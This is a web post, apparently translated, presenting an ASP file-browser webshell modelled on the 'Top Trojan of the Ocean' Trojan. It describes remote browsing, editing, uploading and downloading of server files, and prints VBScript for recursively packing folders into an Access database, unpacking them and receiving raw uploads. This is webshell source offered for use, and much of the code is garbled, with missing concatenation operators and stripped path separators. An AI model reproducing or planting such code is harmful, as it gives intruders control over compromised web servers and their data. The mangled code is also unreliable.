This is an FSO file browser written using FSO collection objects (if you insist on saying it is a Trojan, I have no objection). Functionally, it imitates the design of the "Top Trojan of the Ocean", but the code is completely rewritten. Using components such as Shell.Application that can easily cause accidental killing by anti-virus software. There are many similar tools on the Internet. The use value of this tool is not very great, but many of the codes in it are considered to be well written.
Key features include: View disk information, browse disk files, and operate in a manner similar to Windows Explorer, such as creating, deleting, renaming, copying, moving, and other basic file operations. Text file editing.
Stream mode file download simplifies and optimizes component-free upload file packaging/unpacking. A folder can be completely packaged/unpacked.
Code snippet:
1. File packaging/unpacking part
- Sub Pack( ByVal FPath, ByVal sDbPath)
- Server.ScriptTimeOut=900
- Dim DbPath
- If Right(sDbPath,4)= ".mdb" Then
- DbPath=sDbPath
- Else
- DbPath=sDbPath ".mdb"
- End If
- If oFso.FolderExists(DbPath) Then
- EchoBack "Cannot create database file!" &Replace(DbPath, ""," \")
- Exit Sub
- End If
- If oFso.FileExists(DbPath) Then
- oFso.DeleteFile DbPath
- End If
- If IsFolder(FPath) Then
- RootPath=GetParentFolder(FPath)
- If Right(RootPath,1)<> "" Then RootPath=RootPath&" "
- Else
- EchoBack "Please enter the folder path!"
- Exit Sub
- End If
- Dim oCatalog,connStr,DataName
- Set conn=Server.CreateObject( "ADODB.Connection" )
- Set oStream=Server.CreateObject( "ADODB.Stream" )
- Set oCatalog=Server.CreateObject( "ADOX.Catalog" )
- Set rs=Server.CreateObject( "ADODB.RecordSet" )
- On Error Resume Next
- connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath
- oCatalog.Create connStr
- If Err Then
- EchoBack "Cannot create database file!" &Replace(DbPath, ""," \")
- Exit Sub
- End If
- Set oCatalog= Nothing
- conn.Open connStr
- conn.Execute( "Create Table Files(ID int IDENTITY(0,1) PRIMARY KEY CLUSTERED, FilePath VarChar, FileData Image)" )
- oStream.Open
- oStream.Type=1
- rs.Open "Files" ,conn,3,3
- DataName=Left(oFso.GetFile(DbPath).Name,InstrRev(oFso.GetFile(DbPath).Name, "." )-1)
- NoPackFiles=Replace(NoPackFiles, "<$datafile>" ,DataName)
- FailFileList= ""
- PackFolderFPath
- If FailFilelist= "" Then
- EchoClose "Folder packaging successful!"
- Else
- Response.Write "<link rel= stylesheet type= text/css href= ?page=css >"
- Response.Write "<Script Language= JavaScript >alert( Folder packaging completed!nThe following is a list of files that failed to be packaged: );</Script>"
- Response.Write "<body>" &Replace(FailFilelist, "|" , "<br>" ) "</body>"
- End If
- oStream.Close
- rs.Close
- conn.Close
- End Sub
- Sub PackFolder(FolderPath)
- If Not IsFolder(FolderPath) Then Exit Sub
- Dim oFolder,sFile,sFolder
- Set oFolder=oFso.GetFolder(FolderPath)
- For Each sFile In oFolder.Files
- If InStr(NoPackFiles, "|" &sFile.Name "|" )<1 Then
- PackFile sFile.Path
- End If
- Next
- Set sFile = Nothing
- For Each sFolder In oFolder.SubFolders
- PackFolder sFolder.Path
- Next
- Set sFolder= Nothing
- End Sub
- Sub PackFile(FilePath)
- Dim RelPath
- RelPath=Replace(FilePath,RootPath, "" )
- On Error Resume Next
- Err.Clear
- Err= False
- oStream.LoadFromFile FilePath
- rs.AddNew
- rs( "FilePath" )=RelPath
- rs( "FileData" )=oStream.Read()
- rs.Update
- If Err Then
- FailFilelist=FailFilelist&FilePath "|"
- End If
- End Sub
- Sub UnPack(vFolderPath,DbPath)
- Server.ScriptTimeOut=900
- Dim FilePath,FolderPath,sFolderPath
- FolderPath=vFolderPath
- FolderPath=Trim(FolderPath)
- If Mid(FolderPath,2,1)<> ":" Then
- EchoBack "The path format is incorrect and the directory cannot be created!"
- Exit Sub
- End If
- If Right(FolderPath,1)= "" Then FolderPath=Left(FolderPath,Len(FolderPath)-1)
- Dim connStr
- Set conn=Server.CreateObject( "ADODB.Connection" )
- Set oStream=Server.CreateObject( "ADODB.Stream" )
- Set rs=Server.CreateObject( "ADODB.RecordSet" )
- connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & DbPath
- On Error Resume Next
- Err= False
- conn.Open connStr
- If Err Then
- EchoBack "Database opening error!"
- Exit Sub
- End If
- Err= False
- oStream.Open
- oStream.Type=1
- rs.Open "Files" ,conn,1,1
- FailFilelist= ""
- Do Until rs.EOF
- Err.Clear
- Err= False
- FilePath=FolderPath ""&rs(" FilePath")
- FilePath=Replace(FilePath, "\"," ")
- sFolderPath=Left(FilePath,InStrRev(FilePath, "" ))
- If Not oFso.FolderExists(sFolderPath) Then
- CreateFolder(sFolderPath)
- End If
- oStream.SetEos()
- oStream.Write rs( "FileData" )
- oStream.SaveToFile FilePath,2
- If Err Then
- FailFilelist=FailFilelist&rs( "FilePath" ).Value "|"
- End If
- rs.MoveNext
- Loop
- rs.Close
- Set rs = Nothing
- conn.Close
- Set conn= Nothing
- Set oStream = Nothing
- If FailFilelist= "" Then
- EchoClose "File unpacking successful!"
- Else
- Response.Write "<link rel= stylesheet type= text/css href= ?page=css >"
- Response.Write "<Script Language= JavaScript >alert(Folder packaging completed!nThe following is a list of files that failed to be packaged, please check);</Script>"
- Response.Write "<body>" &Replace(FailFilelist, "|" , "<br>" ) "</body>"
- End If
- End Sub
2. File upload part (single file):
- Saveupload ( ByVal FolderName)
- If Not IsFolder(FolderName) Then
- EchoClose "No upload folder specified!"
- Exit Sub
- End If
- Dim Path,IsOverWrite
- Path=FolderName
- If Right(Path,1)<> "" Then Path=Path&" "
- FileName=Replace(Request( "filename" ), ""," ")
- If Len(FileName)<1 Then
- EchoBack "Please select the file and enter the file name!"
- Exit Sub
- End If
- Path=Path
- If LCase(Request( "overwrite" ))= "true" Then
- IsOverWrite= True
- Else
- IsOverWrite= False
- End If
- On Error Resume Next
- Call MyUpload(Path,IsOverWrite)
- If Err Then
- EchoBack "File upload failed! (The file may already exist)"
- Else
- EchoClose "File uploaded successfully!n" & Replace(fileName, "", " \")
- End If
- End Sub
- Sub MyUpload(FilePath,IsOverWrite)
- Dim oStream,tStream,FileName,sData,sSpace,sInfo,iSpaceEnd,iInfoStart,iInfoEnd,iFileStart,iFileEnd,iFileSize,RequestSize,bCrLf
- RequestSize=Request.TotalBytes
- If RequestSize<1 Then Exit Sub
- Set oStream=Server.CreateObject( "ADODB.Stream" )
- Set tStream=Server.CreateObject( "ADODB.Stream" )
- With oStream
- .Type=1
- .Mode=3
- .Open
- .Write=Request.BinaryRead(RequestSize)
- .Position=0
- sData=.Read
- bCrLf=ChrB(13)&ChrB(10)
- iSpaceEnd=InStrB(sData,bCrLf)-1
- sSpace =LeftB(sData,iSpaceEnd)
- iInfoStart=iSpaceEnd+3
- iInfoEnd=InStrB(iInfoStart,sData,bCrLf&bCrLf)-1
- iFileStart=iInfoEnd+5
- iFileEnd=InStrB(iFileStart,sData,sSpace)-3
- sData= ""
- iFileSize=iFileEnd-iFileStart+1
- tStream.Type=1
- tStream.Mode=3
- tStream.Open
- .Position=iFileStart-1
- .CopyTo tStream,iFileSize
- If IsOverWrite Then
- tStream.SaveToFile FilePath,2
- Else
- tStream.SaveToFile FilePath
- End If
- tStream.Close
- .Close
- End With
- SettStream = Nothing
- Set oStream= Nothing
- End Sub